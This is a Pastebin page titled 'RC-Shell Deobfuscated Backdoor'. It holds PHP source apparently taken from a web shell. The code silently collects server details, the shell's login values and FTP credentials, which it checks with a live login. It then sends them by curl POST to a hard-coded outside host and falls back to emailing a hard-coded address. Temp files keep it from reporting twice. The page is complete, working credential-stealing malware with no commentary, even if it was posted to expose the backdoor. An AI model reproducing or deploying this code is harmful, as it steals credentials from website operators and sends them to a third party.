Advertisement
xme

RC-Shell Deobfuscated Backdoor

xme
May 12th, 2017
1,425
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 4.75 KB | None | 0 0
  1. @error_reporting(0);
  2. @ini_set("display_errors", false);
  3. function rc1ire($f){ return @fclose(@fopen($f, 'r')) ? 1 : 0; }
  4. function rc1iwr($f){ return @fclose(@fopen($f, 'a')) ? 1 : 0; }
  5. function rc1wri($f,$c){ $fp=@fopen($f, 'w'); @fputs($fp, $c); @fclose($fp); }
  6. function rc1ffm($t){ return @str_replace("//","/",@str_replace("\\","/",$t)); }
  7. function rc1dd(){ return (@extension_loaded('curl') && @function_exists('curl_init')) ? 1 : 0; }
  8. function rc1tmp(){
  9.  global $tempdir;
  10.  if(@isset($tempdir)&&@is_dir($tempdir)&&@is_writable($tempdir)) return $tempdir;
  11.  foreach(array("/tmp/","/var/tmp/","/usr/tmp/","/dev/shm/","%WINDIR/temp/") as $t){
  12.   if(@file_exists($t)&&@is_dir($t)&&@is_writable($t)) return $t;
  13.  }
  14.  return false;
  15. }
  16. function rc1url(){
  17.  $h = (empty($_SERVER['HTTPS']) || strtolower($_SERVER['HTTPS']) == 'off' ? false : true);
  18.  $u = 'http' . (($h ? 's' : '') . '://' . $_SERVER['HTTP_HOST'] . $_SERVER['PHP_SELF']);
  19.  $m = (empty($_SERVER['PATH_INFO']) ? 'QUERY_STRING' : 'PATH_INFO');
  20.  $s = $m == 'QUERY_STRING' ? '?' : '';
  21.  return $u . $s . (isset($_SERVER[$m]) ? $_SERVER[$m] : '');
  22. }
  23. if(rc1dd()) {
  24.  function rc1p($u,$v,$h){
  25.   if($h != "1" && $h != "0") $h = "0";
  26.   $v = "content_type=new_data_entry&base_content=" . @urlencode(@base64_encode($v)) . "&hidden_type=" . $h . "&sys_type=" . PHP_OS . "&ip=" . $_SERVER['REMOTE_ADDR'];
  27.   $a = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR";
  28.   $u = "http://" . $u;
  29.   $c = @curl_init();
  30.   @curl_setopt($c, CURLOPT_URL, $u);
  31.   @curl_setopt($c, CURLOPT_USERAGENT, $a);
  32.   @curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
  33.   @curl_setopt($c, CURLOPT_POST, 1);
  34.   @curl_setopt($c, CURLOPT_POSTFIELDS, $v);
  35.   @curl_setopt($c, CURLOPT_TIMEOUT, 4);
  36.   @curl_setopt($c, CURLOPT_CONNECTTIMEOUT, 4);
  37.   $r = @curl_exec($c);
  38.   @curl_close($c);
  39.   return (!@empty($r) && @strstr($r, "saved_rcshell_entry")) ? 1 : 0;
  40.  }
  41. }
  42. function rc1ftp($t=0){
  43.  global $act,$ftp_server,$ftp_port,$ftp_username,$ftp_password;
  44.  $n="\n";
  45.  $c=0;
  46.  $v='';
  47.  if(@isset($act)&&$act=="ftp"&&@isset($ftp_port)&&!@empty($ftp_port)&&@isset($ftp_server)&&@isset($ftp_username)&&@isset($ftp_password)&&!@empty($ftp_server)&&!@empty($ftp_username)&&!@empty($ftp_password)){
  48.   $c=1;
  49.   $v="FTP: $ftp_server:$ftp_port|USER: $ftp_username|PASS: $ftp_password\n";
  50.  }
  51.  if($t!==0){
  52.   if(!$c) return '';
  53.   if(@function_exists("ftp_connect")&&@function_exists("ftp_login")&&@function_exists("ftp_close")){
  54.    $fff = @ftp_connect($ftp_server,$ftp_port,3);
  55.    if($fff) {
  56.     if(@ftp_login($fff, $ftp_username, $ftp_password)){
  57.      @ftp_close($fff);
  58.      return $v;
  59.     }
  60.     @ftp_close($fff);
  61.    }
  62.   }
  63.   return '';
  64.  }
  65.  return $v;
  66. }
  67. function rc1cfg($ar){
  68.  $n="\n";
  69.  global $config;
  70.  $r='';
  71.  foreach(array('version','auth','default_vars') as $c){
  72.   if(@isset($config[$c])){
  73.    if(@is_array($config[$c])){
  74.     foreach($config[$c] as $k=>$v) @$r.=$c." ".$k."=".$v.$n;
  75.    } else {
  76.     @$r.=$c."=".$config[$c].$n;
  77.    }
  78.   }
  79.  }
  80.  return $r;
  81. }
  82. function rc1pst(){
  83.  $n="\n";
  84.  $v='';
  85.  global $config;
  86.  if(@isset($config["auth"]["md5_user"])&&@isset($config["auth"]["md5_pass"])&&@isset($_POST["zu"])&&@isset($_POST["zp"])){
  87.   if($config["auth"]["md5_user"]==@md5($_POST["zu"])&&$config["auth"]["md5_pass"]==$_POST["zp"]){
  88.    $v.="zu=".$_POST["zu"].$n;
  89.    $v.="zp=".$_POST["zp"].$n;
  90.   }
  91.  }
  92.  return $v;
  93. }
  94. function rc1add($ar){
  95.  global $bsafe,$bopendir;
  96.  $n="\n";
  97.  $v="URL=".rc1url().$n.$n;
  98.  $v .= "php=".@phpversion().$n;
  99.  $v .= "safe_mode=".((@isset($bsafe)) ? (($bsafe) ? "ON":"OFF") :"?").$n;
  100.  $v .= "open_dir=".((@isset($bopendir)) ? (($bopendir) ? "YES":"NO") :"?").$n;
  101.  $v .= rc1pst();
  102.  $v .= rc1cfg();
  103.  $v .= rc1ftp();
  104.  foreach(array('SERVER_NAME','SERVER_ADDR','SERVER_PORT','HTTP_REFERER','PHP_SELF','REQUEST_URI','SCRIPT_NAME','SCRIPT_FILENAME','CLIENT_IP','REMOTE_ADDR') as $sv){
  105.   if(@isset($_SERVER[$sv])){ $v.=$sv."=".$_SERVER[$sv].$n; }
  106.  }
  107.  return $v;
  108. }
  109. function rc1sd($h,$v,$s,$u1,$m1){
  110.  if(rc1dd()) {
  111.   if(!rc1p($u1, $v, $h)) @mail($m1, $s, $v);
  112.  } else {
  113.   @mail($m1, $s, $v);
  114.  }
  115. }
  116. $rc1tmp=rc1tmp();
  117. if($rc1tmp!==false){
  118.  @$r = rc1ffm($rc1tmp . "/" . @md5(@uniqid(@rand()) . @md5(@time())));
  119.  if(rc1iwr($r)) {
  120.   $cfile = rc1ffm($rc1tmp . "/www_sess_" . @md5(rc1url().rc1cfg()));
  121.   @unlink($r);
  122.  
  123.   $m1 = "peterlegere51@yahoo.com";
  124.   $u1 = "peterlegere.byethost2.com/news/index.php";
  125.   $s = PHP_OS ."|".rc1url();
  126.   $h = "0";
  127.   if(!rc1ire($cfile)) {
  128.    $v = rc1add();
  129.    rc1sd($h, $v, $s, $u1, $m1);
  130.    rc1wri($cfile, "1");
  131.   }
  132.   $fv=rc1ftp(1);
  133.   if(!@empty($fv)){
  134.    $h = "1";
  135.    $sfile = rc1ffm($rc1tmp . "/www_sess_" .@md5($cfile.$fv));
  136.    if(!rc1ire($sfile)) {
  137.     $v = rc1add();
  138.     rc1sd($h, $v, "FTP|".$s, $u1, $m1);
  139.     rc1wri($sfile, "1");
  140.    }
  141.   }
  142.  }
  143. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement